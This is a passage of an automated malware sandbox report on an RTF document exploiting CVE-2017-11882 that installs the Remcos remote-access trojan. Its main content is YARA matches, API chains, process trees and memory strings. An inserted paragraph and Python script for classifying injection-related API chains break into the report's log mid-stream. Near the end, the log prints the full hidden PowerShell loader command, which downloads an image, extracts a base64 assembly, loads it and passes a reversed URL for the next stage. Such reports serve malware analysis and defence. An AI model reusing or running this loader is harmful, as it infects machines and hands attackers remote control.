                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00414957
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004079EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00407AEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0044AA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00412AA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00404B74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00404B03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0044BBD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00404BE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00404C76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00415CFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00416D72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00446D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00446D8B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00406E8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00405038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0041208C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_004050A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0040511A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0043C13A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_004051AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00449300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0040D322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0044A4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0043A5AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00413631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00446690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0044A730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_004398D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_004498E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0044A886
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0043DA09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00438D5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00449ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0041FE83
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00430F54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004050C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004014AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00405133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004051A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00401246
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0040CA46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00405235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004032C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00401689
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00402F60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004169A7 appears 87 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004165FF appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434801 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00422297 appears 42 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434E70 appears 54 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00402093 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 0044DB70 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00401E65 appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00444B5A appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00413025 appears 79 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00416760 appears 69 times
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf, type: SAMPLE | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 3800, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR | Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: bhv5928.tmp.11.dr | Binary or memory string: org.slneighbors
                  Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winRTF@19/18@5/4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
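The API chains the report prints for the unpacked RegAsm.exe payload are the evidence behind its injection and evasion verdicts: function 8_2_0041812A earlier in this section (CreateProcessW, GetThreadContext, NtUnmapViewOfSection, NtMapViewOfSection, WriteProcessMemory, SetThreadContext, ResumeThread) is textbook process hollowing, 8_2_0041BB9A and 8_2_0041BBC6 suspend and resume a foreign process, and the rows just above show privilege adjustment, a Toolhelp process walk and a service start through the SCM. The following Python is an added triage helper, not part of the report or of Joe Sandbox: it parses these rows as the extraction left them (the fused "exeCode function:" and the function id repeated after the last API), then flags ordered API subsequences that match a technique. The technique labels and ATT&CK ids are this example's own mapping, an assumption the reader should adjust to their own playbook; the sample rows are copied from this report.

```python
import re

# Constructed sample input: "Code function" rows copied from this report, in the
# fused form the extraction left them in. Two rows without an API chain are
# included to show they are parsed, or skipped, correctly.
SAMPLE_ROWS = [
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,8_2_0041812A",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,8_2_0041BB9A",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_0041798D",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,8_2_0040F4AF",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AADB",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043706A8_2_0043706A",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times",
]

# source path, function id (<process>_<run>_<address>), API list, repeated id.
ROW_RE = re.compile(
    r"Source: (?P<source>.*?)Code function: "
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]{8}) ?(?P<apis>.*?)(?P=fid)$"
)

# Ordered API subsequences and the technique each one is evidence for. This
# mapping is the example's own heuristic (assumption), not Joe Sandbox's logic.
TECHNIQUES = [
    ("process hollowing (T1055.012)",
     ["CreateProcessW", "GetThreadContext", "NtUnmapViewOfSection",
      "WriteProcessMemory", "SetThreadContext", "ResumeThread"]),
    ("suspend foreign process (NtSuspendProcess)", ["OpenProcess", "NtSuspendProcess"]),
    ("resume foreign process (NtResumeProcess)", ["OpenProcess", "NtResumeProcess"]),
    ("token privilege adjustment (T1134)", ["LookupPrivilegeValueA", "AdjustTokenPrivileges"]),
    ("process enumeration (T1057)",
     ["CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"]),
    ("service start via SCM (T1569.002)", ["OpenSCManagerW", "OpenServiceW", "StartServiceW"]),
]


def parse_row(row):
    """Split one report row into source, function id and API list.

    Returns None for rows that carry no function id, such as the
    'String function: ... appears N times' statistics rows."""
    m = ROW_RE.search(row)
    if not m:
        return None
    apis = [a for a in m["apis"].split(",") if a]
    return {"source": m["source"], "fid": m["fid"], "apis": apis}


def contains_in_order(apis, pattern):
    """True if every API in pattern occurs in apis in that order (gaps allowed)."""
    it = iter(apis)
    return all(any(a == wanted for a in it) for wanted in pattern)


def classify(apis):
    return [label for label, pattern in TECHNIQUES if contains_in_order(apis, pattern)]


def triage(rows):
    """Map function id -> technique labels for every row whose chain matches."""
    findings = {}
    for row in rows:
        parsed = parse_row(row)
        if parsed is None:
            continue
        hits = classify(parsed["apis"])
        if hits:
            findings[parsed["fid"]] = hits
    return findings


if __name__ == "__main__":
    for fid, hits in triage(SAMPLE_ROWS).items():
        print(fid, "->", "; ".join(hits))
```

The subsequence match rather than an exact-sequence match matters: the hollowing chain in 8_2_0041812A is interleaved with GetProcAddress resolution, VirtualAlloc and a failure path (TerminateProcess), and an exact signature would miss it. Rows with a bare address and no API list, like 8_2_0043706A, parse cleanly but produce no finding.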
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-OT0ZCG
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR7129.tmp
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................T.r.u.e.(.P..............................+.........................s............................0...............
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ....................................u.e.(.P..............................+.........................s............................................
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | System information queried: HandleInformation
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.387908629.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfVirustotal: Detection: 53%
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfReversingLabs: Detection: 47%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo =
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\grmnuvnmumxdrrgkqp"
